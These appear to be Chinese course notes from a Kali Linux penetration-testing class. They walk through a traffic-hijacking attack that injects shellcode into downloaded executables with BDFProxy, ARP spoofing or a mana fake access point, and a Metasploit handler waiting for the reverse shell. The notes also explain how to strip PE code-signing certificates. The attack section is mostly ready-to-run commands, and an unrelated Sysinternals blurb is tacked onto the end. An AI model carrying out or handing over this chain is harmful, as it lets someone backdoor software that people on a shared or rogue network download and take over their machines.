本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程
1. 简介
Bdfproxy(mitmproxy)
- 基于流量劫持(中间人攻击)动态注入 shellcode (ARP spoof、DNS spoof、Fake AP)
步骤
- sysctl -w net.ipv4.ip_forward=1
- iptables -t nat -A PREROUTING -p tcp –dport 80/443 -j REDIRECT –to-ports 8080
- vi /etc/bdfproxy/bdfproxy.cfg
- proxyMode = transparent
修改侦听 IP 地址bdfproxy
- proxyMode = transparent
arpspoof -i eth0 -t 1.1.1.2 1.1.1.1
启动 msf
流程
- mana 创建 Fack AP
- badfproxy 代理注入代码
- msf 侦听反弹 shell
2. 使用
修改 IP 转发
root@kali:~# vim /etc/sysctl.conf net.ipv4.ip_forward=1
修改 iptables
root@kali:~# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080 root@kali:~# iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8080
修改配置文件
root@kali:~# vim /etc/bdfproxy/bdfproxy.cfg proxyMode = transparent HOST = 10.10.10.131 #108行,117行,128行,替换所有的,有6个
启动 bdfproxy
root@kali:~# bdfproxy
启动 msfconsole
root@kali:~# msfconsole -r /root/bdfproxy_msf_resource.rc msf exploit(multi/handler) > jobs
arp 欺骗
root@kali:~# arpspoof -i eth0 -t 10.10.10.133 10.10.10.2
靶机访问浏览器下载软件,并运行
![](https://i.imgur.com/1qLFgFZ.png)
3. 无线流量劫持
vi /etc/mana-toolkit/hostapd-mana.conf
- 修改无线 SSID 名称
./usr/share/mana-toolkit/run-mana/start-nat-simple.sh
- 修改 wlan1 无线网卡适配器并启动
- iptables -t nat -A PREROUTING -i $phy -p tcp –dport 80/443 -j REDIRECT –to-port 8080
vi /etc/bdfproxy/bdfproxy.cfg
- proxyMode = transparent
- 修改侦听 IP 地址并启动 badfproxy
启动 msf
- msfconsole -r /usr/share/bdfproxy/bdfproxy_msf_resource.rc
补充内容
- 全站 HTTPS 防注入(微软每个补丁都带码)
- PE 文件证书签名可被清除
- PE Header -> Optional Header -> Certificate Table(Address and size)
- 全部用 0 覆盖
- BDF 默认清除数字签名
https://live.sysinternals.com/
这是允许访问所有Sysinternals公用程序的文件共享。我们已经开发了这个功能来测试我们实用程序的替代分配机制。
这将允许您从任何连接到互联网的计算机运行这些工具,而无需导航到网页,下载并解压zip文件。
Sysinternals网站由Mark Russinovich于1996年创建,主办他先进的系统实用程序和技术信息。无论您是IT专业人员还是开发人员,您都可以找到Sysinternals实用程序来帮助您管理,诊断和诊断Windows系统和应用程序。